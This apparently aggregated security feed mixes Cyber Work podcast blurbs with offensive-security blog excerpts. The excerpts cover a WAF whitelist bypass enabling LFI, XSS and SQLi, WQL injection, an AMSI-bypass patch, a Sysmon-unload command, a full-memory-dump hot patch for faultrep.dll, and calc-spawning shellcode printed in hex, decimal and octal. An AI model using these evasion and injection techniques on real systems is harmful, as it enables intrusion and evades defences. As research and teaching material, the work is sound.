Whether you’re new to cybersecurity or an experienced professional, CompTIA has a certification for you — and training for those certifications is easier than ever with the new on-demand training platform Infosec Skills. This episode of the Cyber Work podcast is a rebroadcast of a webinar featuring Patrick Lane, CompTIA Director of Products, and Jeff Peters, Product Marketing Manager for Infosec. In this podcast, you'll get an overview of CompTIA certifications, learn about potential IT and security career paths and hear questions from live viewers about training and certifications.

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

💾

Sam Bouso, Founder of Precognitive Inc, and Cyber Work podcast host Chris Sienko discuss current security risks in online retail, fraud prevention, online shopping behavior, and how some fraud prevention strategies can actually hurt online retailers.

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

💾

Kelly Shortridge, VP of Product Strategy at Capsule8, and Cyber Work Podcast host Chris Sienko discuss how for introduce security teams early into the product development process, as well as cognitive biases in security decision-making at all levels of employment from analysts to CISOs.

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

💾

Gene Yoo, who's worked for Sony, Warner Bros, Coca-Cola, and other megacorporations, and Cyber Work podcast host Chris Sienko, discuss the specific needs for these large companies, how to recover from cyber attacks, career strategies, and gender parity cybersecurity.

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

💾

Nir Gaist, Founder and CTO at Nyotron, and Cyber Work podcast host Chris Sienko, discuss Nir's cybersecurity journey (which started from hacking at the age of 6), the cyber skills gap and how to present yourself to hiring managers.

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

💾

Bob Stevens, VP of Americas at Lookout, and Cyber Work Podcast host Chris Sienko, discuss election cybersecurity strategies, tips and ramifications for 2020.

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

💾

Security awareness programs help organizations achieve the ultimate goal of fewer security incidents, but how do the benefits compare to the costs and time requirements? A new study by Osterman Research uses data from 230 organizations to answer this question and quantify the ROI of security awareness training for both large and small organizations. This episode of the Cyber Work Podcast is a rebroadcast of a webinar featuring Michael Osterman, President and Analyst at Osterman Research, and Lisa Plaggemier, Chief Evangelist at Infosec. In this podcast, you'll learn how to calculate security awareness ROI at your organization, the opportunity cost of not having an awareness program and the costs and returns of security awareness training.

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

💾

John Wheeler, Vice President of Security at Topcoder, and Cyber Work host Chris Sienko discuss hyperspecialization in cybersecurity and coding.

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

💾

Scott Madsen, CEO of Cingo Solutions, and Cyber Work host Chris Sienko discuss transferring into cybersecurity from another career, the importance of transparency in job listings and ways to fix the cyber skills gap.

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

💾

Gary Berman, creator of The Cyberhero Adventures: Defenders of the Digital Universe comic book series, and Cyber Work host Chris Sienko discuss Berman's long history of being hacked, how we overcame it, and his new cybersecurity comic books series aimed to educate from his mistakes.

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

💾

Celebrate National Cybersecurity Awareness Month by learning about privacy with IAPP's Channel Sales Manager Byron Johnson — plus get 30 days of free training with Infosec Skills! This episode of the Cyber Work podcast is a rebroadcast of a webinar featuring Byron Johnson. In this podcast, you'll learn everything you need to know about the shifting privacy landscape, including how privacy is changing cybersecurity, privacy skills and how they apply to different cybersecurity roles, the future of online privacy and data protection laws and privacy certification and career questions from live viewers.

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

💾

Lessons learned by pwning the Offshore pro lab by HTB - Greetings everyone, last is back! So, on the 28th of September I played the RomHack CTF with my fellow mates from JBZ and we arrived third, thanks to a flag submitted at the last second (a typical CTF tactic to make the other teams relax and then pwn them at...

Tia Hopkins, Vice President of Global Sales Engineering at eSentire, and Cyber Work host Chris Sienko discuss Hopkins' past in physical networking, her pursuit of education and how she advanced her career.

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

💾

Dave Farrow discusses his unconventional career journey and the intersection of engineering and cybersecurity.

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

💾

WebARX is a web application firewall where you can protect your website from malicious attacks. As you can see it was mentioned in TheHackerNews as well and has good ratings if you do some Googling.
https://thehackernews.com/2019/09/webarx-web-application-security.html

It was found out that the WebARX WAF could be easily bypassed by passing a whitelist string. As you see the request won’t be processed by the WAF if it detects a whitelist string.

Let’s first try on their own website. This is a simple LFi payload.

Now if I include a whitelist string such as ithemes-sync-request it would be easily bypassed.

XSS PoC

Here’s an XSS PoC where we pass a simple script tag. It detects the raw request when we pass normally.

But if we include ithemes-sync-request parameter which is a whitelist string the script tag will get executed.

LFi PoC

Here’s a normal payload which will block.

Once we apply the whitelist string it’s bypassed.

SQLi PoC

Here’s a normal payload which will block.

Once we apply the whitelist string it’s bypassed.

These whitelist strings are more like a kill switch for this firewall. I’m not quite sure the developers of this project understands the logic behind it. It’s more like coded by an amateur programmer for a university assignment.

Thanks for checking it, we also messaged you, but never heard back. Unfortunately for the sake of balancing false negatives, even more advanced WAFs tend to have ways for bypass (especially with XSS). Thanks for your help and we'll definitely work on improvements!

— WebARX (@webarx_security) October 8, 2019

Atif Mushtaq, founder and CEO of SlashNext, and Cyber Work host Chris Sienko discuss the current and future trends of web-based phishing and malware attacks.

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

💾

Generally in application security, the user input must be sanitized. When it comes to SQL injection the root cause most of the time is because the input not being sanitized properly. I was curious about Windows Management Instrumentation Query Language – WQL which is the SQL for WMI. Can we abuse WQL if the input is not sanitized?

I wrote a simple application in C++ which gets the service information from the Win32_Service class. It will display members such as Name, ProcessId, PathName, Description, etc.

This is the WQL Query.

SELECT * FROM win32_service where Name='User Input'

As you can see I am using the IWbemServices::ExecQuery method to execute the query and enumerte its members using the IEnumWbemClassObject::Next method.

BSTR input = L"SELECT * FROM win32_service where Name='User Input'";

if (FAILED(hRes = pService->ExecQuery(L"WQL", input, WBEM_FLAG_FORWARD_ONLY, NULL, &pEnumerator))) {
	pLocator->Release();
	pService->Release();
	cout << "Unable to retrive Services: 0x" << std::hex << hRes << endl;
	return 1;
}

IWbemClassObject* clsObj = NULL;
int numElems;
while ((hRes = pEnumerator->Next(WBEM_INFINITE, 1, &clsObj, (ULONG*)&numElems)) != WBEM_S_FALSE) {
	if (FAILED(hRes)) break;
	VARIANT vRet;
	VariantInit(&vRet);
	if (SUCCEEDED(clsObj->Get(L"Name", 0, &vRet, NULL, NULL))
		&& vRet.vt == VT_BSTR) {
		wcout << L"Name: " << vRet.bstrVal << endl;
		VariantClear(&vRet);
}

Once the user enters a service name the application will display its members.

I was thinking if it’s possible to make the query true and return all the services of the target host. Something like id=1 or 1=1 in SQLi where we make the statement logically true.
Since the user input is not properly sanitized in this case we can use the and keyword and enumerate all the services by using the like keyword.

SELECT * FROM win32_service where Name='Appinfo' or name like '[^]%'

You could simply use “%” as well.

This is just a simple demonstration to prove WQL injection. I’m sure there might be better cases to demonstrate this. However, Extended WQL which is a superset of the WQL can be used to combine statements and do more cool stuff. It’s used by the System Center Configuration Manager – SCCM. Always sanitize the input of the application.

You can download the applications from here to play around.
https://github.com/OsandaMalith/WMI/releases/download/1/WinServiceInfo.7z

Recently I push some updates to the project after an exchange of ideas on the possibility of creating a PR towards the Metasploit master branch.

The most significant are:

Module

Added the ability to inject HostingCLR into an existing process via the PID parameter Added the ability to specify the process to be created instead of notepad.exe Added parameter to enable / disable Amsi bypass Refactoring of the code to comply with Metasploit best practices

DLL

Added functionality to detect the CLR necessary for the assembly in order to load the correct one, thus also supporting .Net 3.5 assemblies. Added verification of the CLR already loaded in the process, if already loaded a new one is not instantiated. Amsi Bypass using AmsiScanBuffer patching technique.

In the first part I focused more on the ruby ​​code because the implementation of the HostingCLR dll was almost the same as presented by Etor Madiv in his original project. In this second part we will instead focus on improving the dll in order to be feasible for a PR on the Metasploit main branch.

How to find witch CLR version is needed

To be able to load the correct CLR version we need to know witch version the assembly requires. Furthermore, the verification must be able to be performed on a byte array.

The first thing that comes up in mind is to see if it is possible to find a signature inside the byte array to determine the version. A Windows executable, EXE or DLL, must conform to a file format called PE. A standard Windows PE file is divided into sections:

1. MS-DOS header
2. PE header
3. optional header
4. Native Image Section (.data, .rdata, .rsrc, .text)

These are the standard sections of a typical Windows executable. The C/C++ compiler allows you to add your custom sections to the PE file using a #pragma compiler directive.

What about the CLR? Metadata and IL code find space in an extension of the COFF/PE format.

The CLR data part contains metadata and IL code, both determine how the program will be executed. Compilers for the CLR must issue both the CLR header and the data information in the generated PE file, otherwise the resulting PE file will not be executed in the CLR. The CLR header holds a number of relevant details required by the runtime, like Runtime, MetaData directory and Entry point token.

MS Docs

So now we know that it is possible to extract the version. Opening a .Net assembly with HxD we can see how the version changes by rebuilding with different Target Frameworks and determining signatures for the search.

.Net 4.0

.Net 3.5

CLR v4.0.30319 - 76 34 2E 30 2E 33 30 33 31 39 CLR v2.0.50727 - 76 32 2E 30 2E 35 30 37 32 37

Load CLR only if needed

Another interesting idea is the possibility to load the CLR only if necessary.

For example we could think of using for the PROCESS powershell.exe parameter that we know to be a .Net process or to locate the pid of a .Net process, and go to load the assembly directly using the CLR already available.

This can be easily done by going to enumerate the runtimes loaded through EnumerateLoadedRuntime

If the required runtime is already loaded, use it without creating a new one.

Amsi bypass

Starting from the version of the Framework 4.8 Anti Malware Scan Interface is also integrated into the CLR, this means that the Assembly.Load call is subject to scanning by Amsi.

For the Amsi bypass I opted for AmsiScanBuffer Patching tencique.

Celebrate National Cybersecurity Awareness Month by learning how to start a cybersecurity career with CompTIA's Chief Technology Evangelist James Stanger — plus get 30 days of free training with Infosec Skills! This episode of the Cyber Work Podcast is a rebroadcast of a live webinar featuring James Stanger. In this podcast, you'll learn everything you need to know about getting started in cybersecurity, including using the CompTIA career path to build your skills and land your first cybersecurity job, why Security+ has become the go-to entry-level cybersecurity certification, the different types of entry-level cybersecurity jobs available and how you can train to earn your next CompTIA certification.

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

💾

Jason Dion, a cybersecurity training leader and an Infosec Skills course author, and Cyber Work host Chris Sienko discuss subscription-based cybersecurity training, study strategies and the skills gap.

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

💾

Allan Buxton, Director of Forensics at SECUREDATA, Inc., and Cyber Work host, Chris Sienko, discuss Allan's career journey, how digital forensics play into both government and civil sectors, and a day in the life as a director of forensics.

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

💾

The binary fltMC.exe is used to manage minifilter drivers. You can easily load and unload minifilters using this binary. To unload the Sysmon driver you can use:

fltMC unload SysmonDrv

If this binary is flagged, we can unload the minifilter driver by calling the ‘FilterUnload’ which is the Win32 equivalent of ‘FltUnloadFilter’. It will call the minifilter’s ‘FilterUnloadCallback’ (PFLT_FILTER_UNLOAD_CALLBACK) routine. This is as same as using fltMC which is a Non-mandatory unload.
For calling this API SeLoadDriverPrivilege is required. To obtain this privelege adminsitrative permissions are required.

Here’s a simple C code I wrote to call the ‘FilterUnload’ API.

https://github.com/OsandaMalith/WindowsInternals/blob/master/Unload_Minifilter.c

Note that when unloading a minifilter driver by the FilterManager, it will be logged under the System log.

References:
https://www.osr.com/nt-insider/2017-issue2/introduction-standard-isolation-minifilters/

Alissa Knight, Senior Analyst at Aite Group, discusses API security, the Magecart hacking group, recent breaches, formjacking skimmers and her upcoming book.

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

💾

Bradley Gross, founder and president of Law Office of Bradley Gross and an expert in technology and digital law, discusses his career arc from hacker to lawyer and the various layers of cybersecurity law.

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

💾

I found out this old undocumented API “CreateMinidumpW” inside the faultrep.dll on Windows XP and Windows Server 2003. This API ends up calling the dbghelp!MiniDumpWriteDump to dump the process by dynamically loading the dbghelp.dll on runtime.

The function takes 3 arguments. I really have no clue what this 3rd argument’s structure is. I passed 0 as the pointer to the structure so by default we end up getting 0x21 as the MINIDUMP_TYPE.

CreateMinidumpW(DWORD dwProcessId, LPCWSTR lpFileName, struct tagSMDumpOptions *)

This is the call stack

dbgcore.dll!_MiniDumpWriteDump@28
faultrep.dll!InternalGenerateMinidumpEx(void *,unsigned long,void *,struct tagSMDumpOptions *,unsigned short const *,int)	
faultrep.dll!InternalGenerateMinidump(void *,unsigned long,unsigned short const *,struct tagSMDumpOptions *,int)	
faultrep.dll!CreateMinidumpW(unsigned long,unsigned short const *,struct tagSMDumpOptions *)

As you see it calls the dbghelp!MiniDumpWriteDump by loading the dbghelp.dll using the LoadLibraryExW API.

However, this function ‘faultrep.dll!InternalGenerateMinidumpEx’ doesn’t provide a full dump. As you can see it passes 0x21 or it compares the 3rd argument which is a structure and based on that value it passes 0x325.

0x21 = MiniDumpWithDataSegs | MiniDumpWithUnloadedModules	

0x325 = MiniDumpWithDataSegs | MiniDumpWithHandleData | MiniDumpWithPrivateReadWriteMemory | MiniDumpWithProcessThreadData | MiniDumpWithUnloadedModules

What you could do is, patch it to a 0x2 to make it a ‘MiniDumpWithFullMemory’. You can find the 64-bit version of the patched DLL from here https://github.com/OsandaMalith/WindowsInternals/tree/master/CreateMinidump

This is the PoC of calling this API. You can copy the DLL from Windows XP and it will work fine. Not sure how this is useful. Just sharing what I found

UPDATE: I wrote a hot patch for both 32-bit and 64-bit faultrep DLLs. It will allow you to get a full process dump passing MiniDumpWithFullMemory as the MINIDUMP_TYPE. Tested on Windows XP 32-bit and 64-bit. On other systems by copying the original DLLs in the same folder will work fine. You can find the repo with DLL files from here https://github.com/OsandaMalith/WindowsInternals/tree/master/CreateMinidump/Hot%20Patch

Some uses

I was in an engagement today and tried with success the CreateMinidump_HotPatch of @OsandaMalith in both win2003 x32 and Win10 x64. Especially in Windows 10 Symantec did not complain at all!!! pic.twitter.com/kKS1KqEqpa

— m3g9tr0n (@m3g9tr0n) September 10, 2019

Ever wish you had a cybersecurity expert on-call to answer your career questions? Here’s your chance! In this open Q&A webinar, Keatron Evans, Infosec instructor and Managing Partner at KM Cyber Security, answered anything and everything related to getting started in cybersecurity and helping take your career to the next level. This episode of the Cyber Work podcast is a rebroadcast of a webinar featuring Keatron Evans. In this podcast, you'll learn everything you need to know about getting started and progressing in your cybersecurity career, including where Keatron got his start in cybersecurity, how to boost your cybersecurity skills on your own and why some employers weigh aptitude over experience.

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

💾

Cheryl Kerrigan, Vice President of People at BlueCat, discusses the importance of communication, soft skills and healthy employee cultures in modern cybersecurity companies.

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

💾

Here’s a cool thing I figured out in position-independent code. I would rephrase the title as running position-independent code instead of shellcode. Check my previous article Executing Shellcode Directly where I used a minimal PE and pointed the AddressofEntryPoint to the beginning of the PIC.

So the goal is to run shellcode in C without any function pointers or any functions at all, not even a main function For example, this is all the code. I declare the variable name as “main”. I am using the Microsoft’s Visual C compiler with no parameters.

char main[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
"\x75\xf2\x89\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01"
"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x43\x72\x65\x61\x75"
"\xf2\x81\x7e\x08\x6f\x63\x65\x73\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
"\xb1\xff\x53\xe2\xfd\x68\x63\x61\x6c\x63\x89\xe2\x52\x52\x53\x53"
"\x53\x53\x53\x53\x52\x53\xff\xd7";

After compiling it won’t of course run. Why? Well, the initialized data will end up in the “.data” section.

This section has no execute permissions. So let’s add execute permissions and see.

That’s it! the position independent code executes nicely

Well, this seems a bit of a hassle to change flags each time you want to run shellcode. Let’s tell the linker to give Execute and Write permission to the “.data” section while linking.

/*
* Author: @OsandaMalith
* Website: https://osandamalith.com
*/
#pragma comment(linker,"/SECTION:.data,EW")

char main[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
"\x75\xf2\x89\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01"
"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x43\x72\x65\x61\x75"
"\xf2\x81\x7e\x08\x6f\x63\x65\x73\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
"\xb1\xff\x53\xe2\xfd\x68\x63\x61\x6c\x63\x89\xe2\x52\x52\x53\x53"
"\x53\x53\x53\x53\x52\x53\xff\xd7";

Another tricky way would be to place the shellcode in the “.rdata” section and merge it with the “.text” section. And of course, you can give Execute permission to the “.rdata” section like we did before and execute as well.

/*
* Author: @OsandaMalith
* Website: https://osandamalith.com
*/
#pragma comment(linker,"/MERGE:.rdata=.text")

char const main[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
"\x75\xf2\x89\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01"
"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x43\x72\x65\x61\x75"
"\xf2\x81\x7e\x08\x6f\x63\x65\x73\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
"\xb1\xff\x53\xe2\xfd\x68\x63\x61\x6c\x63\x89\xe2\x52\x52\x53\x53"
"\x53\x53\x53\x53\x52\x53\xff\xd7";

Now if you see our code is merged in the ‘.text’ section and it will execute nicely.

You can place the shellcode directly in the ‘.text’ without modifying the PE structure like this. Thanks to @yair_omer for mentioning this.

#pragma section(".text")

__declspec(allocate(".text")) char main[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
"\x75\xf2\x89\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01"
"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x43\x72\x65\x61\x75"
"\xf2\x81\x7e\x08\x6f\x63\x65\x73\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
"\xb1\xff\x53\xe2\xfd\x68\x63\x61\x6c\x63\x89\xe2\x52\x52\x53\x53"
"\x53\x53\x53\x53\x52\x53\xff\xd7";

You can also write shellcode in any number base. For example in decimals:

/*
* Author: @OsandaMalith
* Website: https://osandamalith.com
*/
#pragma comment(linker,"/SECTION:.data,EW")
int main[] = {
	-1869574000, -1869574000, -1956324559, 2139828347,
	478120716, -1962391669, 1066082423, 856456832,
	-947260811, -1958971389, -1040091049, 18905739,
	-1948415545, -972968140, 1128169797, 1969317234,
	142508530, 1936024431, 2055989621, 1724317988,
	-1955648373, -956228486, -55608181, -645282047,
	-497811535, 1633904893, -494312596, 1397969490,
	1397969747, -671132846
};

This is in octal.

/*
* Author: @OsandaMalith
* Website: https://osandamalith.com
*/
#pragma comment(linker,"/SECTION:.data,EW")
int main[] = {
	022044110220, 022044110220, 021331155461, 017742630173,
	03437705414, 021302043613, 07742620167, 06303077200,
	030742371165, 021317074003, 030200274127, 0110075213,
	021367304707, 030600327464, 010317500505, 016530262562,
	01037500762, 016331261557, 017242764565, 014661600444,
	021333626213, 030700216172, 037453676213, 033142343401,
	034224777661, 014130664375, 034242261554, 012324651122,
	012324651523, 032777651522
};

Under GCC you don’t need to change section permissions, it will automatically place in the ‘.text’ section. Make sure your code is position indepdent or else it won’t work on other Windows systems due to dynamic addressing of DLLs. In this way, you can execute your shellcode without any function pointers. You can check out some of my public shellcodes from here.

Jonathan Butler, Professional Services & Security Analytics Manager at Distil Networks, discusses his security analyst journey, what someone should like doing if they plan on going into the field, and the future of security analytics as a whole.

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

💾